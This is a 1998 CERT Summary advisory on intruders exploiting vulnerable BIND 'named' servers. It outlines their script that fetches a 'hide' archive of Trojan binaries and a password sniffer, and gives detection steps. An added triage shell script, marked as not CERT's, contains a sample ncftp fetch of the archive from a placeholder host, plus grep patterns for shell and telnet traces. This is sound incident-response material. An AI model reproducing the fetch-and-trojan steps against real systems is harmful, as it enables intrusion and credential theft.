Date: Thu, 21 May 1998 15:34:28 -0400
From: CERT Advisory <[email protected]>
To: [email protected]
Subject: CERT Summary CS-98.04
-----BEGIN PGP SIGNED MESSAGE-----
CERT* Summary CS-98.04 - SPECIAL EDITION
May 21, 1998
This special edition of the CERT Summary reports increasing attacks on
machines running "named" (domain name server software, part of BIND).
Past CERT Summaries are available from
ftp://ftp.cert.org/pub/cert_summaries/
- ---------------------------------------------------------------------------
The CERT Coordination Center has received reports of increasing
intruder activity indicating that intruders are targeting machines
running vulnerable versions of "named" (domain name server software
that is part of BIND). Many sites running unpatched, vulnerable
versions of "named" have been compromised.
We encourage you to review CERT Advisory CA-98.05, which describes the
BIND buffer overflow vulnerability that is being exploited, and to
apply the appropriate patches if you have not done so already. The
advisory is available at
http://www.cert.org/advisories/CA-98.05.bind_problems.html
Some operating system distributions have the vulnerable version of
"named" installed and enabled by default. When you are installing an
operating system on a machine, ensure that the version of the
operating system you use contains a patch for this problem; if your
operating system is vulnerable and does not contain a patch,
immediately apply the patch after you install the operating system.
For more information about which operating systems have vulnerable
versions of "named", see CA-98.05.
Increasing Intruder Activity
- ----------------------------
Intruders are increasingly scanning networks for machines running
vulnerable versions of "named". This increased activity against "named"
is consistent with trends we have seen with previous vulnerabilities: in
those cases, intruders launched widespread scans to look for machines
running vulnerable IMAP servers or web servers with the "phf"
vulnerability, and then exploited the vulnerability on those machines.
While we have had many reported incidents involving the exploitation
of "named", at least one incident appears to involve widespread
attacks against authoritative domain name servers.
Description of Some Current Attacks
- -----------------------------------
In some incidents reported to us, it appears that after the "named"
server is compromised, the intruder runs a script that
- telnets to another host (potentially the host launching the
attack) on port 666
- obtains an intruder tool archive named "hide" via ncftp or ftp
- unpacks and installs the contents of the "hide" archive
This "hide" archive includes the following Trojan horse programs:
ifconfig
inetd
ls
named
netstat
ps
pstree
syslogd
tcpd
top
The Trojan horse "named" program appears to contain a back door that
allows the intruder to open an xterm window from the compromised host
back to the intruder's system. If any of the other Trojan horse
programs were installed, they cannot be relied upon to provide
accurate information about processes, network connections, or files
present on the system.
The "hide" archive also contains several other intruder tools and
configuration files including
/dev/reset
/dev/pmcf1
/dev/pmcf2
/dev/pmcf3
/dev/pmcf4
fix
The "/dev/reset" program appears to be a sniffer program that captures
and logs cleartext passwords transmitted over the local area
network. The "pmcf" files appear to be configuration files for the
Trojan horse programs mentioned above. "fix" is a program that is
used to install the Trojan horse programs on a compromised machine.
In cases where the intruders successfully installed the Trojan horse
programs, the "fix" program and the "hide" archive were deleted.
The binary programs in this particular archive have been compiled for
the Intel x86 architecture and the Linux operating system, but the
attack could easily be adapted to other systems.
Vulnerable "named" servers other than ones on Linux may abort and dump
core if an intruder attempts to use the specific exploit designed for
the Intel x86 architecture. This means that a core file for a domain
name server may indicate a specific failed attempt to compromise the
domain name server, but the domain name server could still be successfully
compromised with the use of a different intruder exploit script.
Look for Compromise on Your Systems
- -----------------------------------
To determine whether or not your system has been compromised by an
intruder, we encourage you to follow the steps identified in our
Intruder Detection Checklist, available at
ftp://ftp.cert.org/pub/tech_tips/intruder_detection_checklist
Suggestions for detecting this specific activity include
- Compare the MD5 checksums for the files listed above with the
  MD5 checksums from versions that are known to be correct. Compute
  the checksums with a trusted "md5" or "md5sum" binary from known-good
  media (or with the suspect disk mounted on a clean host); the Trojan
  horse "ls" and the other replaced programs cannot be relied upon to
  show you the files honestly.
- Look for the sniffer program "/dev/reset", the "/dev/pmcf*"
configuration files and the sniffer output file, which in many
incidents has been "/usr/lib/libsn.a".
- Check to see if your system log contains messages like
    May 1 11:28:49 named[28464]: starting. named
    LOCAL-980501.020913 Fri May 1 02:09:13 EDT 1998
    ^Iroot@:/usr/lib/tntbot/bind/named
  This message may indicate that you are running a Trojan horse
  version of "named". (The "^I" is syslog's rendering of a tab
  character; what follows it is BIND's record of who built the binary
  and where, in the form user@host:directory. A build directory such
  as "/usr/lib/tntbot/bind" that you do not recognize as your own BIND
  source tree is a warning sign even apart from the "tntbot" name.)
- Investigate any unexpected crashes or restarts of the named and
"inetd" daemons occurring recently, especially since April 27,
1998. The intruder's installation script kills these daemons
and then restarts them with the new Trojan horse versions.
- Examine core dumps from recently crashed "named" servers. Some of
the sites attacked have reported that their core files contain
portions of the exploit script used in this attack. Sites that have
reported such crashes appear to be running operating systems other
than Linux. In these cases, it is possible that the intruder was
not successful in compromising the machine. However, the "named"
server is still potentially vulnerable and could be compromised
successfully in a different attempt.
- The .ncftp file in root's home directory may contain information
showing unexpected ftp file transfers.
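The checks in the list above, together with the core-dump inspection,
can be run as one offline triage pass. The script below is an added
example for this summary, not a CERT tool and not anything recovered from
an incident: it walks a suspect filesystem mounted read-only at ROOT from
known-good media, looks for the "hide" artifacts, compares the listed
binaries against a baseline of trusted MD5 checksums, pulls the Trojan
"named" start message and recent named/inetd restarts out of syslog,
extracts printable strings from a named core file, and greps root's
.ncftp for the archive fetch. The baseline format (md5sum output of
trusted copies, with the paths they have on the suspect system), the
core file location, and the sample tree it builds for a dry run are all
assumptions of this example.

```shell
#!/bin/sh
# Added example, not part of the CERT summary or of any CERT tool: offline
# triage for the "hide" indicators listed above. Run from known-good media
# against the suspect filesystem mounted read-only at ROOT, because the host's
# own ls, ps, netstat and find may be the Trojan horse versions. BASELINE is
# assumed to be md5sum(1) output for trusted copies of the binaries.

# Sniffer, config and log artifacts named in the summary, relative to ROOT.
HIDE_ARTIFACTS="dev/reset dev/pmcf1 dev/pmcf2 dev/pmcf3 dev/pmcf4 usr/lib/libsn.a usr/lib/tntbot"

md5_of() {  # md5sum(1) on Linux, openssl(1) as the fallback on BSD-style media
    if command -v md5sum >/dev/null 2>&1; then md5sum "$1" | cut -d' ' -f1
    else openssl md5 -r "$1" | cut -d' ' -f1; fi
}

# find_hide_artifacts ROOT: one "ARTIFACT /path" line per indicator present.
find_hide_artifacts() {
    for rel in $HIDE_ARTIFACTS; do
        [ -e "$1/$rel" ] && echo "ARTIFACT /$rel"
    done
    return 0
}

# verify_binaries ROOT BASELINE: "MODIFIED /path" or "MISSING /path" for each
# baseline entry ("md5  /path") whose copy under ROOT does not hash to it.
verify_binaries() {
    while read -r expected path; do
        [ -n "$path" ] || continue
        if [ ! -f "$1$path" ]; then echo "MISSING $path"
        elif [ "$(md5_of "$1$path")" != "$expected" ]; then echo "MODIFIED $path"; fi
    done < "$2"
    return 0
}

# scan_syslog FILE: flag the intruder build path from the Trojan named's start
# message, and list every named start and inetd message for manual review.
scan_syslog() {
    [ -f "$1" ] || return 0
    grep -n 'tntbot' "$1" | sed 's/^/TROJAN-NAMED /'
    grep -nE 'named\[[0-9]+\]: starting|inetd\[[0-9]+\]:' "$1" | sed 's/^/RESTART /'
    return 0
}

# scan_core FILE: printable strings from a named core (portable stand-in for
# strings(1)), filtered to shell/ftp fragments an exploit script would leave.
scan_core() {
    [ -f "$1" ] || return 0
    tr -c '[:print:]' '\n' < "$1" | grep -E '/bin/sh|ncftp|hide|:666|telnet' | sed 's/^/CORE /'
    return 0
}

# check_ncftp ROOT: root's .ncftp (file or directory, depending on the ncftp
# version) may record the fetch of the "hide" archive.
check_ncftp() {
    [ -e "$1/root/.ncftp" ] || return 0
    grep -rn 'hide' "$1/root/.ncftp" | sed 's/^/NCFTP /'
    return 0
}

run_triage() {  # run_triage ROOT BASELINE
    echo "== artifacts under $1";  find_hide_artifacts "$1"
    echo "== binaries vs $2";      verify_binaries "$1" "$2"
    echo "== syslog";              scan_syslog "$1/var/log/messages"
    echo "== named core";          scan_core "$1/var/named/core"
    echo "== root's .ncftp";       check_ncftp "$1"
}

# build_sample_tree DIR: a constructed suspect filesystem for a dry run. Every
# file and log line here is made up for this example, not from a real incident.
build_sample_tree() {
    mkdir -p "$1/dev" "$1/bin" "$1/sbin" "$1/usr/lib" "$1/root/.ncftp" "$1/var/log" "$1/var/named"
    : > "$1/dev/reset"; : > "$1/dev/pmcf1"; : > "$1/usr/lib/libsn.a"
    printf 'genuine ls\n' > "$1/bin/ls"; printf 'genuine ps\n' > "$1/bin/ps"
    printf 'genuine ifconfig\n' > "$1/sbin/ifconfig"
    { for b in /bin/ls /bin/ps /sbin/ifconfig; do printf '%s  %s\n' "$(md5_of "$1$b")" "$b"; done; } > "$1/baseline.md5"
    printf 'trojaned ps\n' > "$1/bin/ps"; rm "$1/sbin/ifconfig"   # one replaced, one removed
    printf 'May  1 11:28:49 ns1 named[28464]: starting.  named LOCAL-980501.020913 Fri May 1 02:09:13 EDT 1998 ^Iroot@:/usr/lib/tntbot/bind/named\n' > "$1/var/log/messages"
    printf 'May  1 11:28:47 ns1 inetd[28460]: restarted\n' >> "$1/var/log/messages"
    printf '\001\002\003cd /tmp; ncftp -g 192.0.2.10 hide.tgz\000\377' > "$1/var/named/core"
    printf '192.0.2.10 /tmp/hide.tgz\n' > "$1/root/.ncftp/history"
}

# Stand-alone: sh triage.sh /mnt/suspect /path/to/baseline.md5
# With no arguments it runs against the constructed sample tree.
if [ $# -ge 2 ]; then run_triage "$1" "$2"
else
    SAMPLE=$(mktemp -d); build_sample_tree "$SAMPLE"
    run_triage "$SAMPLE" "$SAMPLE/baseline.md5"; rm -rf "$SAMPLE"
fi
```

Every finding is printed with a fixed prefix (ARTIFACT, MODIFIED, MISSING,
TROJAN-NAMED, RESTART, CORE, NCFTP) so the output can be grepped or fed to
a ticket. A clean pass proves little on its own: the summary notes that
the installer deletes "fix" and the "hide" archive, and a Trojan "ls" on
a live system would hide the /dev files, which is why the script is meant
to run against a mounted, unbooted disk rather than on the suspect host.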
If you determine that your systems may have been root compromised as a result
of this activity, we encourage you to refer to the "Recovering from an
Incident" web page available at
http://www.cert.org/nav/recovering.html
- ---------------------------------------------------------------------------
How to Contact the CERT Coordination Center
Email [email protected]
Phone +1 412-268-7090 (24-hour hotline)
CERT personnel answer on business days
8:30-5:00 p.m. EST (GMT-5)/EDT(GMT-4),
and are on call for emergencies during
other hours.
Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USA
To be added to our mailing list for CERT advisories and bulletins, send your
email address to
[email protected]
In the subject line, type
SUBSCRIBE your-email-address
CERT advisories and bulletins are posted on the USENET news group
comp.security.announce
CERT publications, information about FIRST representatives, and other
security-related information are available for anonymous FTP from
http://www.cert.org/
ftp://ftp.cert.org/pub/
If you wish to send sensitive incident or vulnerability information to CERT
staff by electronic mail, we strongly advise you to encrypt your message.
We can support a shared DES key or PGP. Contact the CERT staff for more
information.
Location of CERT PGP key
ftp://ftp.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Copyright 1998 Carnegie Mellon University. Conditions for use, disclaimers,
and sponsorship information can be found in
http://www.cert.org/legal_stuff.html and ftp://ftp.cert.org/pub/legal_stuff .
If you do not have FTP or web access, send mail to [email protected] with
"copyright" in the subject line.
* CERT is registered in the U.S. Patent and Trademark Office.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBNWR4gnVP+x0t4w7BAQF/wQP/QxT1ZApG3SLWndRQ0svlEFV5OVo22bWX
H+61HPAn7h5dLsk1hMzer5Nvi1SpOT2aT9gFtb4tTHiaJ/E9NazWB2QBSXNDhMEz
p5+rbSiPvEsbRjysRQhzaG6GC2bib7tsaozGUka/XAKEjtJeJxzlZk++9AFkvtMp
QQzljs3cPd4=
=iQy0
-----END PGP SIGNATURE-----